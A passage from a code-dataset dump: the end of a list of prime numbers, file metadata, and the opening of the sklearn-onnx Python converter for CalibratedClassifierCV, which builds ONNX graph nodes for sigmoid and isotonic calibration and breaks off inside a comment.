58733,58741,58757,58763,58771,58787,58789,58831,58889,58897,58901,58907,58909,58913,58921,58937,58943,58963,58967,58979,58991,58997,59009,59011,59021,59023,59029,59051,59053,59063,59069,59077,59083,59093,59107,59113,59119,59123,59141,59149,59159,59167,59183,59197,59207,59209,59219,59221,59233,59239,59243,59263,59273,59281,59333,59341,59351,59357,59359,59369,59377,59387,59393,59399,59407,59417,59419,59441,59443,59447,59453,59467,59471,59473,59497,59509,59513,59539,59557,59561,59567,59581,59611,59617,59621,59627,59629,59651,59659,59663,59669,59671,59693,59699,59707,59723,59729,59743,59747,59753,59771,59779,59791,59797,59809,59833,59863,59879,59887,59921,59929,59951,59957,59971,59981,59999,60013,60017,60029,60037,60041,60077,60083,60089,60091,60101,60103,60107,60127,60133,60139,60149,60161,60167,60169,60209,60217,60223,60251,60257,60259,60271,60289,60293,60317,60331,60337,60343,60353,60373,60383,60397,60413,60427,60443,60449,60457,60493,60497,60509,60521,60527,60539,60589,60601,60607,60611,60617,60623,60631,60637,60647,60649,60659,60661,60679,60689,60703,60719,60727,60733,60737,60757,60761,60763,60773,60779,60793,60811,60821,60859,60869,60887,60889,60899,60901,60913,60917,60919,60923,60937,60943,60953,60961,61001,61007,61027,61031,61043,61051,61057,61091,61099,61121,61129,61141,61151,61153,61169,61211,61223,61231,61253,61261,61283,61291,61297,61331,61333,61339,61343,61357,61363,61379,61381,61403,61409,61417,61441,61463,61469,61471,61483,61487,61493,61507,61511,61519,61543,61547,61553,61559,61561,61583,61603,61609,61613,61627,61631,61637,61643,61651,61657,61667,61673,61681,61687,61703,61717,61723,61729,61751,61757,61781,61813,61819,61837,61843,61861,61871,61879,61909,61927,61933,61949,61961,61967,61979,61981,61987,61991,62003,62011,62017,62039,62047,62053,62057,62071,62081,62099,62119,62129,62131,62137,62141,62143,62171,62189,62191,62201,62207,62213,62219,62233,62273,62297,62299,62303,62311,62323,62327,62347,62351,62383,62401,62417,62423,62459,62467,62473,62477,62483,62497,62501,62507,62533,62539,62549,62563,62581,62591,62597,62603,62617,62627,62633,62639,62653,62659,62683,62687,62701,62723,62731,62743,62753,62761,62773,62791,62801,62819,62827,62851,62861,62869,62873,62897,62903,62921,62927,62929,62939,62969,62971,62981,62983,62987,62989,63029,63031,63059,63067,63073,63079,63097,63103,63113,63127,63131,63149,63179,63197,63199,63211,63241,63247,63277,63281,63299,63311,63313,63317,63331,63337,63347,63353,63361,63367,63377,63389,63391,63397,63409,63419,63421,63439,63443,63463,63467,63473,63487,63493,63499,63521,63527,63533,63541,63559,63577,63587,63589,63599,63601,63607,63611,63617,63629,63647,63649,63659,63667,63671,63689,63691,63697,63703,63709,63719,63727,63737,63743,63761,63773,63781,63793,63799,63803,63809,63823,63839,63841,63853,63857,63863,63901,63907,63913,63929,63949,63977,63997,64007,64013,64019,64033,64037,64063,64067,64081,64091,64109,64123,64151,64153,64157,64171,64187,64189,64217,64223,64231,64237,64271,64279,64283,64301,64303,64319,64327,64333,64373,64381,64399,64403,64433,64439,64451,64453,64483,64489,64499,64513,64553,64567,64577,64579,64591,64601,64609,64613,64621,64627,64633,64661,64663,64667,64679,64693,64709,64717,64747,64763,64781,64783,64793,64811,64817,64849,64853,64871,64877,64879,64891,64901,64919,64921,64927,64937,64951,64969,64997,65003,65011,65027,65029,65033,65053,65063,65071,65089,65099,65101,65111,65119,65123,65129,65141,65147,65167,65171,65173,65179,65183,65203,65213,65239,65257,65267,65269,65287,65293,65309,65323,65327,65353,65357,65371,65381,65393,65407,65413,65419,65423,65437,65447,65449,65479,65497,65519,65521,65537,65539,65543,65551,65557,65563,65579,65581,65587,65599,65609,65617,65629,65633,65647,65651,65657,65677,65687,65699,65701,65707,65713,65717,65719,65729,65731,65761,65777,65789,65809,65827,65831,65837,65839,65843,65851,65867,65881,65899,65921,65927,65929,65951,65957,65963,65981,65983,65993,66029,66037,66041,66047,66067,66071,66083,66089,66103,66107,66109,66137,66161,66169,66173,66179,66191,66221,66239,66271,66293,66301,66337,66343,66347,66359,66361,66373,66377,66383,66403,66413,66431,66449,66457,66463,66467,66491,66499,66509,66523,66529,66533,66541,66553,66569,66571,66587,66593,66601,66617,66629,66643,66653,66683,66697,66701,66713,66721,66733,66739,66749,66751,66763,66791,66797,66809,66821,66841,66851,66853,66863,66877,66883,66889,66919,66923,66931,66943,66947,66949,66959,66973,66977,67003,67021,67033,67043,67049,67057,67061,67073,67079,67103,67121,67129,67139,67141,67153,67157,67169,67181,67187,67189,67211,67213,67217,67219,67231,67247,67261,67271,67273,67289,67307,67339,67343,67349,67369,67391,67399,67409,67411,67421,67427,67429,67433,67447,67453,67477,67481,67489,67493,67499,67511,67523,67531,67537,67547,67559,67567,67577,67579,67589,67601,67607,67619,67631,67651,67679,67699,67709,67723,67733,67741,67751,67757,67759,67763,67777,67783,67789,67801,67807,67819,67829,67843,67853,67867,67883,67891,67901,67927,67931,67933,67939,67943,67957,67961,67967,67979,67987,67993,68023,68041,68053,68059,68071,68087,68099,68111,68113,68141,68147,68161,68171,68207,68209,68213,68219,68227,68239,68261,68279,68281,68311,68329,68351,68371,68389,68399,68437,68443,68447,68449,68473,68477,68483,68489,68491,68501,68507,68521,68531,68539,68543,68567,68581,68597,68611,68633,68639,68659,68669,68683,68687,68699,68711,68713,68729,68737,68743,68749,68767,68771,68777,68791,68813,68819,68821,68863,68879,68881,68891,68897,68899,68903,68909,68917,68927,68947,68963,68993,69001,69011,69019,69029,69031,69061,69067,69073,69109,69119,69127,69143,69149,69151,69163,69191,69193,69197,69203,69221,69233,69239,69247,69257,69259,69263,69313,69317,69337,69341,69371,69379,69383,69389,69401,69403,69427,69431,69439,69457,69463,69467,69473,69481,69491,69493,69497,69499,69539,69557,69593,69623,69653,69661,69677,69691,69697,69709,69737,69739,69761,69763,69767,69779,69809,69821,69827,69829,69833,69847,69857,69859,69877,69899,69911,69929,69931,69941,69959,69991,69997,70001,70003,70009,70019,70039,70051,70061,70067,70079,70099,70111,70117,70121,70123,70139,70141,70157,70163,70177,70181,70183,70199,70201,70207,70223,70229,70237,70241,70249,70271,70289,70297,70309,70313,70321,70327,70351,70373,70379,70381,70393,70423,70429,70439,70451,70457,70459,70481,70487,70489,70501,70507,70529,70537,70549,70571,70573,70583,70589,70607,70619,70621,70627,70639,70657,70663,70667,70687,70709,70717,70729,70753,70769,70783,70793,70823,70841,70843,70849,70853,70867,70877,70879,70891,70901,70913,70919,70921,70937,70949,70951,70957,70969,70979,70981,70991,70997,70999,71011,71023,71039,71059,71069,71081,71089,71119,71129,71143,71147,71153,71161,71167,71171,71191,71209,71233,71237,71249,71257,71261,71263,71287,71293,71317,71327,71329,71333,71339,71341,71347,71353,71359,71363,71387,71389,71399,71411,71413,71419,71429,71437,71443,71453,71471,71473,71479,71483,71503,71527,71537,71549,71551,71563,71569,71593,71597,71633,71647,71663,71671,71693,71699,71707,71711,71713,71719,71741,71761,71777,71789,71807,71809,71821,71837,71843,71849,71861,71867,71879,71881,71887,71899,71909,71917,71933,71941,71947,71963,71971,71983,71987,71993,71999,72019,72031,72043,72047,72053,72073,72077,72089,72091,72101,72103,72109,72139,72161,72167,72169,72173,72211,72221,72223,72227,72229,72251,72253,72269,72271,72277,72287,72307,72313,72337,72341,72353,72367,72379,72383,72421,72431,72461,72467,72469,72481,72493,72497,72503,72533,72547,72551,72559,72577,72613,72617,72623,72643,72647,72649,72661,72671,72673,72679,72689,72701,72707,72719,72727,72733,72739,72763,72767,72797,72817,72823,72859,72869,72871,72883,72889,72893,72901,72907,72911,72923,72931,72937,72949,72953,72959,72973,72977,72997,73009,73013,73019,73037,73039,73043,73061,73063,73079,73091,73121,73127,73133,73141,73181,73189,73237,73243,73259,73277,73291,73303,73309,73327,73331,73351,73361,73363,73369,73379,73387,73417,73421,73433,73453,73459,73471,73477,73483,73517,73523,73529,73547,73553,73561,73571,73583,73589,73597,73607,73609,73613,73637,73643,73651,73673,73679,73681,73693,73699,73709,73721,73727,73751,73757,73771,73783,73819,73823,73847,73849,73859,73867,73877,73883,73897,73907,73939,73943,73951,73961,73973,73999,74017,74021,74027,74047,74051,74071,74077,74093,74099,74101,74131,74143,74149,74159,74161,74167,74177,74189,74197,74201,74203,74209,74219,74231,74257,74279,74287,74293,74297,74311,74317,74323,74353,74357,74363,74377,74381,74383,74411,74413,74419,74441,74449,74453,74471,74489,74507,74509,74521,74527,74531,74551,74561,74567,74573,74587,74597,74609,74611,74623,74653,74687,74699,74707,74713,74717,74719,74729,74731,74747,74759,74761,74771,74779,74797,74821,74827,74831,74843,74857,74861,74869,74873,74887,74891,74897,74903,74923,74929,74933,74941,74959,75011,75013,75017,75029,75037,75041,75079,75083,75109,75133,75149,75161,75167,75169,75181,75193,75209,75211,75217,75223,75227,75239,75253,75269,75277,75289,75307,75323,75329,75337,75347,75353,75367,75377,75389,75391,75401,75403,75407,75431,75437,75479,75503,75511,75521,75527,75533,75539,75541,75553,75557,75571,75577,75583,75611,75617,75619,75629,75641,75653,75659,75679,75683,75689,75703,75707,75709,75721,75731,75743,75767,75773,75781,75787,75793,75797,75821,75833,75853,75869,75883,75913,75931,75937,75941,75967,75979,75983,75989,75991,75997,76001,76003,76031,76039,76079,76081,76091,76099,76103,76123,76129,76147,76157,76159,76163,76207,76213,76231,76243,76249,76253,76259,76261,76283,76289,76303,76333,76343,76367,76369,76379,76387,76403,76421,76423,76441,76463,76471,76481,76487,76493,76507,76511,76519,76537,76541,76543,76561,76579,76597,76603,76607,76631,76649,76651,76667,76673,76679,76697,76717,76733,76753,76757,76771,76777,76781,76801,76819,76829,76831,76837,76847,76871,76873,76883,76907,76913,76919,76943,76949,76961,76963,76991,77003,77017,77023,77029,77041,77047,77069,77081,77093,77101,77137,77141,77153,77167,77171,77191,77201,77213,77237,77239,77243,77249,77261,77263,77267,77269,77279,77291,77317,77323,77339,77347,77351,77359,77369,77377,77383,77417,77419,77431,77447,77471,77477,77479,77489,77491,77509,77513,77521,77527,77543,77549,77551,77557,77563,77569,77573,77587,77591,77611,77617,77621,77641,77647,77659,77681,77687,77689,77699,77711,77713,77719,77723,77731,77743,77747,77761,77773,77783,77797,77801,77813,77839,77849,77863,77867,77893,77899,77929,77933,77951,77969,77977,77983,77999,78007,78017,78031,78041,78049,78059,78079,78101,78121,78137,78139,78157,78163,78167,78173,78179,78191,78193,78203,78229,78233,78241,78259,78277,78283,78301,78307,78311,78317,78341,78347,78367,78401,78427,78437,78439,78467,78479,78487,78497,78509,78511,78517,78539,78541,78553,78569,78571,78577,78583,78593,78607,78623,78643,78649,78653,78691,78697,78707,78713,78721,78737,78779,78781,78787,78791,78797,78803,78809,78823,78839,78853,78857,78877,78887,78889,78893,78901,78919,78929,78941,78977,78979,78989,79031,79039,79043,79063,79087,79103,79111,79133,79139,79147,79151,79153,79159,79181,79187,79193,79201,79229,79231,79241,79259,79273,79279,79283,79301,79309,79319,79333,79337,79349,79357,79367,79379,79393,79397,79399,79411,79423,79427,79433,79451,79481,79493,79531,79537,79549,79559,79561,79579,79589,79601,79609,79613,79621,79627,79631,79633,79657,79669,79687,79691,79693,79697,79699,79757,79769,79777,79801,79811,79813,79817,79823,79829,79841,79843,79847,79861,79867,79873,79889,79901,79903,79907,79939,79943,79967,79973,79979,79987,79997,79999,80021,80039,80051,80071,80077,80107,80111,80141,80147,80149,80153,80167,80173,80177,80191,80207,80209,80221,80231,80233,80239,80251,80263,80273,80279,80287,80309,80317,80329,80341,80347,80363,80369,80387,80407,80429,80447,80449,80471,80473,80489,80491,80513,80527,80537,80557,80567,80599,80603,80611,80621,80627,80629,80651,80657,80669,80671,80677,80681,80683,80687,80701,80713,80737,80747,80749,80761,80777,80779,80783,80789,80803,80809,80819,80831,80833,80849,80863,80897,80909,80911,80917,80923,80929,80933,80953,80963,80989,81001,81013,81017,81019,81023,81031,81041,81043,81047,81049,81071,81077,81083,81097,81101,81119,81131,81157,81163,81173,81181,81197,81199,81203,81223,81233,81239,81281,81283,81293,81299,81307,81331,81343,81349,81353,81359,81371,81373,81401,81409,81421,81439,81457,81463,81509,81517,81527,81533,81547,81551,81553,81559,81563,81569,81611,81619,81629,81637,81647,81649,81667,81671,81677,81689,81701,81703,81707,81727,81737,81749,81761,81769,81773,81799,81817,81839,81847,81853,81869,81883,81899,81901,81919,81929,81931,81937,81943,81953,81967,81971,81973,82003,82007,82009,82013,82021,82031,82037,82039,82051,82067,82073,82129,82139,82141,82153,82163,82171,82183,82189,82193,82207,82217,82219,82223,82231,82237,82241,82261,82267,82279,82301,82307,82339,82349,82351,82361,82373,82387,82393,82421,82457,82463,82469,82471,82483,82487,82493,82499,82507,82529,82531,82549,82559,82561,82567,82571,82591,82601,82609,82613,82619,82633,82651,82657,82699,82721,82723,82727,82729,82757,82759,82763,82781,82787,82793,82799,82811,82813,82837,82847,82883,82889,82891,82903,82913,82939,82963,82981,82997,83003,83009,83023,83047,83059,83063,83071,83077,83089,83093,83101,83117,83137,83177,83203,83207,83219,83221,83227,83231,83233,83243,83257,83267,83269,83273,83299,83311,83339,83341,83357,83383,83389,83399,83401,83407,83417,83423,83431,83437,83443,83449,83459,83471,83477,83497,83537,83557,83561,83563,83579,83591,83597,83609,83617,83621,83639,83641,83653,83663,83689,83701,83717,83719,83737,83761,83773,83777,83791,83813,83833,83843,83857,83869,83873,83891,83903,83911,83921,83933,83939,83969,83983,83987,84011,84017,84047,84053,84059,84061,84067,84089,84121,84127,84131,84137,84143,84163,84179,84181,84191,84199,84211,84221,84223,84229,84239,84247,84263,84299,84307,84313,84317,84319,84347,84349,84377,84389,84391,84401,84407,84421,84431,84437,84443,84449,84457,84463,84467,84481,84499,84503,84509,84521,84523,84533,84551,84559,84589,84629,84631,84649,84653,84659,84673,84691,84697,84701,84713,84719,84731,84737,84751,84761,84787,84793,84809,84811,84827,84857,84859,84869,84871,84913,84919,84947,84961,84967,84977,84979,84991,85009,85021,85027,85037,85049,85061,85081,85087,85091,85093,85103,85109,85121,85133,85147,85159,85193,85199,85201,85213,85223,85229,85237,85243,85247,85259,85297,85303,85313,85331,85333,85361,85363,85369,85381,85411,85427,85429,85439,85447,85451,85453,85469,85487,85513,85517,85523,85531,85549,85571,85577,85597,85601,85607,85619,85621,85627,85639,85643,85661,85667,85669,85691,85703,85711,85717,85733,85751,85781,85793,85817,85819,85829,85831,85837,85843,85847,85853,85889,85903,85909,85931,85933,85991,85999,86011,86017,86027,86029,86069,86077,86083,86111,86113,86117,86131,86137,86143,86161,86171,86179,86183,86197,86201,86209,86239,86243,86249,86257,86263,86269,86287,86291,86293,86297,86311,86323,86341,86351,86353,86357,86369,86371,86381,86389,86399,86413,86423,86441,86453,86461,86467,86477,86491,86501,86509,86531,86533,86539,86561,86573,86579,86587,86599,86627,86629,86677,86689,86693,86711,86719,86729,86743,86753,86767,86771,86783,86813,86837,86843,86851,86857,86861,86869,86923,86927,86929,86939,86951,86959,86969,86981,86993,87011,87013,87037,87041,87049,87071,87083,87103,87107,87119,87121,87133,87149,87151,87179,87181,87187,87211,87221,87223,87251,87253,87257,87277,87281,87293,87299,87313,87317,87323,87337,87359,87383,87403,87407,87421,87427,87433,87443,87473,87481,87491,87509,87511,87517,87523,87539,87541,87547,87553,87557,87559,87583,87587,87589,87613,87623,87629,87631,87641,87643,87649,87671,87679,87683,87691,87697,87701,87719,87721,87739,87743,87751,87767,87793,87797,87803,87811,87833,87853,87869,87877,87881,87887,87911,87917,87931,87943,87959,87961,87973,87977,87991,88001,88003,88007,88019,88037,88069,88079,88093,88117,88129,88169,88177,88211,88223,88237,88241,88259,88261,88289,88301,88321,88327,88337,88339,88379,88397,88411,88423,88427,88463,88469,88471,88493,88499,88513,88523,88547,88589,88591,88607,88609,88643,88651,88657,88661,88663,88667,88681,88721,88729,88741,88747,88771,88789,88793,88799,88801,88807,88811,88813,88817,88819,88843,88853,88861,88867,88873,88883,88897,88903,88919,88937,88951,88969,88993,88997,89003,89009,89017,89021,89041,89051,89057,89069,89071,89083,89087,89101,89107,89113,89119,89123,89137,89153,89189,89203,89209,89213,89227,89231,89237,89261,89269,89273,89293,89303,89317,89329,89363,89371,89381,89387,89393,89399,89413,89417,89431,89443,89449,89459,89477,89491,89501,89513,89519,89521,89527,89533,89561,89563,89567,89591,89597,89599,89603,89611,89627,89633,89653,89657,89659,89669,89671,89681,89689,89753,89759,89767,89779,89783,89797,89809,89819,89821,89833,89839,89849,89867,89891,89897,89899,89909,89917,89923,89939,89959,89963,89977,89983,89989,90001,90007,90011,90017,90019,90023,90031,90053,90059,90067,90071,90073,90089,90107,90121,90127,90149,90163,90173,90187,90191,90197,90199,90203,90217,90227,90239,90247,90263,90271,90281,90289,90313,90353,90359,90371,90373,90379,90397,90401,90403,90407,90437,90439,90469,90473,90481,90499,90511,90523,90527,90529,90533,90547,90583,90599,90617,90619,90631,90641,90647,90659,90677,90679,90697,90703,90709,90731,90749,90787,90793,90803,90821,90823,90833,90841,90847,90863,90887,90901,90907,90911,90917,90931,90947,90971,90977,90989,90997,91009,91019,91033,91079,91081,91097,91099,91121,91127,91129,91139,91141,91151,91153,91159,91163,91183,91193,91199,91229,91237,91243,91249,91253,91283,91291,91297,91303,91309,91331,91367,91369,91373,91381,91387,91393,91397,91411,91423,91433,91453,91457,91459,91463,91493,91499,91513,91529,91541,91571,91573,91577,91583,91591,91621,91631,91639,91673,91691,91703,91711,91733,91753,91757,91771,91781,91801,91807,91811,91813,91823,91837,91841,91867,91873,91909,91921,91939,91943,91951,91957,91961,91967,91969,91997,92003,92009,92033,92041,92051,92077,92083,92107,92111,92119,92143,92153,92173,92177,92179,92189,92203,92219,92221,92227,92233,92237,92243,92251,92269,92297,92311,92317,92333,92347,92353,92357,92363,92369,92377,92381,92383,92387,92399,92401,92413,92419,92431,92459,92461,92467,92479,92489,92503,92507,92551,92557,92567,92569,92581,92593,92623,92627,92639,92641,92647,92657,92669,92671,92681,92683,92693,92699,92707,92717,92723,92737,92753,92761,92767,92779,92789,92791,92801,92809,92821,92831,92849,92857,92861,92863,92867,92893,92899,92921,92927,92941,92951,92957,92959,92987,92993,93001,93047,93053,93059,93077,93083,93089,93097,93103,93113,93131,93133,93139,93151,93169,93179,93187,93199,93229,93239,93241,93251,93253,93257,93263,93281,93283,93287,93307,93319,93323,93329,93337,93371,93377,93383,93407,93419,93427,93463,93479,93481,93487,93491,93493,93497,93503,93523,93529,93553,93557,93559,93563,93581,93601,93607,93629,93637,93683,93701,93703,93719,93739,93761,93763,93787,93809,93811,93827,93851,93871,93887,93889,93893,93901,93911,93913,93923,93937,93941,93949,93967,93971,93979,93983,93997,94007,94009,94033,94049,94057,94063,94079,94099,94109,94111,94117,94121,94151,94153,94169,94201,94207,94219,94229,94253,94261,94273,94291,94307,94309,94321,94327,94331,94343,94349,94351,94379,94397,94399,94421,94427,94433,94439,94441,94447,94463,94477,94483,94513,94529,94531,94541,94543,94547,94559,94561,94573,94583,94597,94603,94613,94621,94649,94651,94687,94693,94709,94723,94727,94747,94771,94777,94781,94789,94793,94811,94819,94823,94837,94841,94847,94849,94873,94889,94903,94907,94933,94949,94951,94961,94993,94999,95003,95009,95021,95027,95063,95071,95083,95087,95089,95093,95101,95107,95111,95131,95143,95153,95177,95189,95191,95203,95213,95219,95231,95233,95239,95257,95261,95267,95273,95279,95287,95311,95317,95327,95339,95369,95383,95393,95401,95413,95419,95429,95441,95443,95461,95467,95471,95479,95483,95507,95527,95531,95539,95549,95561,95569,95581,95597,95603,95617,95621,95629,95633,95651,95701,95707,95713,95717,95723,95731,95737,95747,95773,95783,95789,95791,95801,95803,95813,95819,95857,95869,95873,95881,95891,95911,95917,95923,95929,95947,95957,95959,95971,95987,95989,96001,96013,96017,96043,96053,96059,96079,96097,96137,96149,96157,96167,96179,96181,96199,96211,96221,96223,96233,96259,96263,96269,96281,96289,96293,96323,96329,96331,96337,96353,96377,96401,96419,96431,96443,96451,96457,96461,96469,96479,96487,96493,96497,96517,96527,96553,96557,96581,96587,96589,96601,96643,96661,96667,96671,96697,96703,96731,96737,96739,96749,96757,96763,96769,96779,96787,96797,96799,96821,96823,96827,96847,96851,96857,96893,96907,96911,96931,96953,96959,96973,96979,96989,96997,97001,97003,97007,97021,97039,97073,97081,97103,97117,97127,97151,97157,97159,97169,97171,97177,97187,97213,97231,97241,97259,97283,97301,97303,97327,97367,97369,97373,97379,97381,97387,97397,97423,97429,97441,97453,97459,97463,97499,97501,97511,97523,97547,97549,97553,97561,97571,97577,97579,97583,97607,97609,97613,97649,97651,97673,97687,97711,97729,97771,97777,97787,97789,97813,97829,97841,97843,97847,97849,97859,97861,97871,97879,97883,97919,97927,97931,97943,97961,97967,97973,97987,98009,98011,98017,98041,98047,98057,98081,98101,98123,98129,98143,98179,98207,98213,98221,98227,98251,98257,98269,98297,98299,98317,98321,98323,98327,98347,98369,98377,98387,98389,98407,98411,98419,98429,98443,98453,98459,98467,98473,98479,98491,98507,98519,98533,98543,98561,98563,98573,98597,98621,98627,98639,98641,98663,98669,98689,98711,98713,98717,98729,98731,98737,98773,98779,98801,98807,98809,98837,98849,98867,98869,98873,98887,98893,98897,98899,98909,98911,98927,98929,98939,98947,98953,98963,98981,98993,98999,99013,99017,99023,99041,99053,99079,99083,99089,99103,99109,99119,99131,99133,99137,99139,99149,99173,99181,99191,99223,99233,99241,99251,99257,99259,99277,99289,99317,99347,99349,99367,99371,99377,99391,99397,99401,99409,99431,99439,99469,99487,99497,99523,99527,99529,99551,99559,99563,99571,99577,99581,99607,99611,99623,99643,99661,99667,99679,99689,99707,99709,99713,99719,99721,99733,99761,99767,99787,99793,99809,99817,99823,99829,99833,99839,99859,99871,99877,99881,99901,99907,99923,99929,99961,99971,99989,99991,100003,100019,100043,100049,100057,100069,100103,100109,100129,100151,100153,100169,100183,100189,100193,100207,100213,100237,100267,100271,100279,100291,100297,100313,100333,100343,100357,100361,100363,100379,100391,100393,100403,100411,100417,100447,100459,100469,100483,100493,100501,100511,100517,100519,100523,100537,100547,100549,100559,100591,100609,100613,100621,100649,100669,100673,100693,100699,100703,100733,100741,100747,100769,100787,100799,100801,100811,100823,100829,100847,100853,100907,100913,100927,100931,100937,100943,100957,100981,100987,100999,101009,101021,101027,101051,101063,101081,101089,101107,101111,101113,101117,101119,101141,101149,101159,101161,101173,101183,101197,101203,101207,101209,101221,101267,101273,101279,101281,101287,101293,101323,101333,101341,101347,101359,101363,101377,101383,101399,101411,101419,101429,101449,101467,101477,101483,101489,101501,101503,101513,101527,101531,101533,101537,101561,101573,101581,101599,101603,101611,101627,101641,101653,101663,101681,101693,101701,101719,101723,101737,101741,101747,101749,101771,101789,101797,101807,101833,101837,101839,101863,101869,101873,101879,101891,101917,101921,101929,101939,101957,101963,101977,101987,101999,102001,102013,102019,102023,102031,102043,102059,102061,102071,102077,102079,102101,102103,102107,102121,102139,102149,102161]
| 57,480
| 57,480
| 0.829715
|
d42861bbc31fff616a52a59b81b7e32ca430c8fa
| 21,484
|
py
|
Python
|
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
skl2onnx/operator_converters/calibrated_classifier_cv.py
|
m3at/sklearn-onnx
|
080b6231cad09b8ada9e1901aa9262e44db0fb74
|
[
"MIT"
] | null | null | null |
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pprint
import numpy as np
from ..proto import onnx_proto
from ..common._apply_operation import (
apply_abs, apply_add, apply_cast, apply_concat, apply_clip,
apply_div, apply_exp, apply_mul, apply_reshape, apply_sub)
from ..common._topology import FloatTensorType
from ..common._registration import register_converter
from .._supported_operators import sklearn_operator_name_map
def _handle_zeros(scope, container, concatenated_prob_name,
reduced_prob_name, n_classes):
"""
This function replaces 0s in concatenated_prob_name with 1s and
0s in reduced_prob_name with n_classes.
"""
cast_prob_name = scope.get_unique_variable_name('cast_prob')
bool_not_cast_prob_name = scope.get_unique_variable_name(
'bool_not_cast_prob')
mask_name = scope.get_unique_variable_name('mask')
masked_concatenated_prob_name = scope.get_unique_variable_name(
'masked_concatenated_prob')
n_classes_name = scope.get_unique_variable_name('n_classes')
reduced_prob_mask_name = scope.get_unique_variable_name(
'reduced_prob_mask')
masked_reduced_prob_name = scope.get_unique_variable_name(
'masked_reduced_prob')
container.add_initializer(n_classes_name, onnx_proto.TensorProto.FLOAT,
[], [n_classes])
apply_cast(scope, reduced_prob_name, cast_prob_name, container,
to=onnx_proto.TensorProto.BOOL)
container.add_node('Not', cast_prob_name,
bool_not_cast_prob_name,
name=scope.get_unique_operator_name('Not'))
apply_cast(scope, bool_not_cast_prob_name, mask_name, container,
to=onnx_proto.TensorProto.FLOAT)
apply_add(scope, [concatenated_prob_name, mask_name],
masked_concatenated_prob_name, container, broadcast=1)
apply_mul(scope, [mask_name, n_classes_name], reduced_prob_mask_name,
container, broadcast=1)
apply_add(scope, [reduced_prob_name, reduced_prob_mask_name],
masked_reduced_prob_name, container, broadcast=0)
return masked_concatenated_prob_name, masked_reduced_prob_name
def _transform_sigmoid(scope, container, model, df_col_name, k):
"""
Sigmoid Calibration method
"""
a_name = scope.get_unique_variable_name('a')
b_name = scope.get_unique_variable_name('b')
a_df_prod_name = scope.get_unique_variable_name('a_df_prod')
exp_parameter_name = scope.get_unique_variable_name(
'exp_parameter')
exp_result_name = scope.get_unique_variable_name('exp_result')
unity_name = scope.get_unique_variable_name('unity')
denominator_name = scope.get_unique_variable_name('denominator')
sigmoid_predict_result_name = scope.get_unique_variable_name(
'sigmoid_predict_result')
container.add_initializer(a_name, onnx_proto.TensorProto.FLOAT,
[], [model.calibrators_[k].a_])
container.add_initializer(b_name, onnx_proto.TensorProto.FLOAT,
[], [model.calibrators_[k].b_])
container.add_initializer(unity_name, onnx_proto.TensorProto.FLOAT,
[], [1])
apply_mul(scope, [a_name, df_col_name], a_df_prod_name, container,
broadcast=0)
apply_add(scope, [a_df_prod_name, b_name], exp_parameter_name,
container, broadcast=0)
apply_exp(scope, exp_parameter_name, exp_result_name, container)
apply_add(scope, [unity_name, exp_result_name], denominator_name,
container, broadcast=0)
apply_div(scope, [unity_name, denominator_name],
sigmoid_predict_result_name, container, broadcast=0)
return sigmoid_predict_result_name
def _transform_isotonic(scope, container, model, T, k):
"""
Isotonic calibration method
This function can only handle one instance at a time because
ArrayFeatureExtractor can only extract based on the last axis,
so we can't fetch different columns for different rows.
"""
if model.calibrators_[k].out_of_bounds == 'clip':
clipped_df_name = scope.get_unique_variable_name('clipped_df')
apply_clip(scope, T, clipped_df_name, container,
operator_name=scope.get_unique_operator_name('Clip'),
max=np.array(model.calibrators_[k].X_max_,
dtype=container.dtype),
min=np.array(model.calibrators_[k].X_min_,
dtype=container.dtype))
T = clipped_df_name
reshaped_df_name = scope.get_unique_variable_name('reshaped_df')
calibrator_x_name = scope.get_unique_variable_name('calibrator_x')
calibrator_y_name = scope.get_unique_variable_name('calibrator_y')
distance_name = scope.get_unique_variable_name('distance')
absolute_distance_name = scope.get_unique_variable_name(
'absolute_distance')
nearest_x_index_name = scope.get_unique_variable_name(
'nearest_x_index')
nearest_y_name = scope.get_unique_variable_name('nearest_y')
if hasattr(model.calibrators_[k], '_X_'):
atX, atY = '_X_', '_y_'
elif hasattr(model.calibrators_[k], '_necessary_X_'):
atX, atY = '_necessary_X_', '_necessary_y_'
elif hasattr(model.calibrators_[k], 'X_thresholds_'):
atX, atY = 'X_thresholds_', 'y_thresholds_'
else:
raise AttributeError(
"Unable to find attribute '_X_' or '_necessary_X_' "
"for type {}\n{}."
"".format(type(model.calibrators_[k]),
pprint.pformat(dir(model.calibrators_[k]))))
container.add_initializer(
calibrator_x_name, onnx_proto.TensorProto.FLOAT,
[len(getattr(model.calibrators_[k], atX))],
getattr(model.calibrators_[k], atX))
container.add_initializer(
calibrator_y_name, onnx_proto.TensorProto.FLOAT,
[len(getattr(model.calibrators_[k], atY))],
getattr(model.calibrators_[k], atY))
apply_reshape(scope, T, reshaped_df_name, container,
desired_shape=(-1, 1))
apply_sub(scope, [reshaped_df_name, calibrator_x_name],
distance_name, container, broadcast=1)
apply_abs(scope, distance_name, absolute_distance_name, container)
container.add_node('ArgMin', absolute_distance_name,
nearest_x_index_name, axis=1,
name=scope.get_unique_operator_name('ArgMin'))
container.add_node(
'ArrayFeatureExtractor',
[calibrator_y_name, nearest_x_index_name],
nearest_y_name, op_domain='ai.onnx.ml',
name=scope.get_unique_operator_name('ArrayFeatureExtractor'))
nearest_y_name_reshaped = scope.get_unique_variable_name(
'nearest_y_name_reshaped')
apply_reshape(scope, nearest_y_name,
nearest_y_name_reshaped, container,
desired_shape=(-1, 1))
return nearest_y_name_reshaped
def convert_calibrated_classifier_base_estimator(scope, operator, container,
model):
# Computational graph:
#
# In the following graph, variable names are in lower case characters only
# and operator names are in upper case characters. We borrow operator names
# from the official ONNX spec:
# https://github.com/onnx/onnx/blob/master/docs/Operators.md
# All variables are followed by their shape in [].
#
# Symbols:
# M: Number of instances
# N: Number of features
# C: Number of classes
# CLASSIFIERCONVERTER: classifier converter corresponding to the op_type
# a: slope in sigmoid model
# b: intercept in sigmoid model
# k: variable in the range [0, C)
# input: input
# class_prob_tensor: tensor with class probabilities(function output)
#
# Graph:
#
# input [M, N] -> CLASSIFIERCONVERTER -> label [M]
# |
# V
# probability_tensor [M, C]
# |
# .----------------'---------.
# | |
# V V
